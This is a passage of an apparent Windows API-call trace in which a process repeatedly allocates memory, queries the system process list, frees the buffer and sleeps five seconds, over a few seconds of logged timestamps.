ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x150000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0218.934] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x150000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x150000, ResultLength=0x0) returned 0x0 [0219.043] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x150000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0219.043] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0219.059] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x150000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0219.059] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x150000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x150000, ResultLength=0x0) returned 0x0 [0219.165] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x150000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0219.165] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0219.168] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x150000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0219.168] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x150000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x150000, ResultLength=0x0) returned 0x0 [0219.271] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x150000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0219.272] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0219.291] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x150000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0219.291] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x150000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x150000, ResultLength=0x0) returned 0x0 [0219.395] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x150000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0219.396] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0219.402] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x150000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0219.402] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x150000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x150000, ResultLength=0x0) returned 0x0 [0219.526] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x150000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0219.526] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0219.543] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x150000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0219.543] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x150000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x150000, ResultLength=0x0) returned 0x0 [0219.646] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x150000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0219.646] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0219.652] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x150000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0219.652] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x150000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x150000, ResultLength=0x0) returned 0x0 [0219.802] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x150000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0219.802] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0219.807] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x150000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0219.808] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x150000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x150000, ResultLength=0x0) returned 0x0 [0219.914] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x150000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0219.915] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0219.921] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x150000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0219.921] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x150000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x150000, ResultLength=0x0) returned 0x0 [0220.024] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x150000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0220.025] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0220.035] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x150000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0220.036] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x150000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x150000, ResultLength=0x0) returned 0x0 [0220.124] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x150000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0220.124] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0220.135] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x150000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0220.135] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x150000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x150000, ResultLength=0x0) returned 0x0 [0220.235] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x150000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0220.235] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0220.244] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x150000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0220.245] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x150000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x150000, ResultLength=0x0) returned 0x0 [0220.349] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x150000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0220.350] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0220.353] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x150000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0220.354] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x150000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x150000, ResultLength=0x0) returned 0x0 [0220.451] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x150000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0220.452] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0220.463] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x150000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0220.463] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x150000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x150000, ResultLength=0x0) returned 0x0 [0220.600] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x150000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0220.601] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0220.603] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x150000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0220.603] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x150000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x150000, ResultLength=0x0) returned 0x0 [0220.701] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x150000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0220.701] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0220.732] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x150000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0220.732] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x150000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x150000, ResultLength=0x0) returned 0x0 [0220.843] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x150000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0220.844] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0220.852] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x150000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0220.853] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x150000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x150000, ResultLength=0x0) returned 0x0 [0220.955] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x150000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0220.956] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0220.962] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x150000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0220.962] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x150000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x150000, ResultLength=0x0) returned 0x0 [0221.052] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x150000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0221.053] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0221.065] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x150000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0221.065] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x150000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x150000, ResultLength=0x0) returned 0x0 [0221.156] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x150000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0221.157] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0221.165] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x150000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0221.165] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x150000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x150000, ResultLength=0x0) returned 0x0 [0221.255] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x150000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0221.255] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0221.258] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x150000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0221.258] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x150000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x150000, ResultLength=0x0) returned 0x0 [0221.345] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x150000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0221.346] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0221.352] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x150000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0221.352] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x150000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x150000, ResultLength=0x0) returned 0x0 [0221.435] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x150000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0221.436] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0221.445] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x150000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0221.446] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x150000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x150000, ResultLength=0x0) returned 0x0 [0221.560] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x150000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0221.561] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0221.570] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x150000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0221.570] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x150000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x150000, ResultLength=0x0) returned 0x0 [0221.658] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x150000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0221.658] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0221.664] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x150000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0221.664] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x150000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x150000, ResultLength=0x0) returned 0x0 [0221.778] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x150000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0221.779] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0221.788] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x150000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0221.789] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x150000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x150000, ResultLength=0x0) returned 0x0 [0221.893] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x150000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0221.894] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0221.898] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x150000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0221.898] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x150000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x150000, ResultLength=0x0) returned 0x0 [0221.986] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x150000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0221.987] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0221.991] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x150000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0221.992] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x150000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x150000, ResultLength=0x0) returned 0x0 [0222.110] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x150000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0222.110] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0222.116] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x150000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0222.117] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x150000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x150000, ResultLength=0x0) returned 0x0 [0222.225] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x150000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0222.225] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0222.241] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x150000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0222.241] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x150000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x150000, ResultLength=0x0) returned 0x0 [0222.346] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x150000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0222.346] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0222.354] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x150000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0222.354] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x150000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x150000, ResultLength=0x0) returned 0x0 [0222.450] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x150000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0222.451] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0222.463] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x150000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0222.464] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x150000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x150000, ResultLength=0x0) returned 0x0 [0222.587] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x150000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0222.588] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0222.625] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x150000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0222.626] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x150000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x150000, ResultLength=0x0) returned 0x0 [0222.747] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x150000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0222.748] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0222.760] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x150000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0222.760] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x150000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x150000, ResultLength=0x0) returned 0x0 [0222.847] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x150000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0222.848] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0222.849] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x150000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0222.849] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x150000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x150000, ResultLength=0x0) returned 0x0 [0222.944] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x150000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0222.945] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0222.960] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x150000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0222.960] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x150000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x150000, ResultLength=0x0) returned 0x0 [0223.041] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x150000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0223.042] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0223.052] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x150000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0223.052] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x150000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x150000, ResultLength=0x0) returned 0x0 [0223.143] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x150000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0223.144] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0223.146] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x150000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0223.146] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x150000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x150000, ResultLength=0x0) returned 0x0 [0223.227] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x150000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0223.227] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0223.240] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x150000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0223.240] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x150000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x150000, ResultLength=0x0) returned 0x0 [0223.328] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x150000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0223.329] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0223.337] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x150000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0223.337] 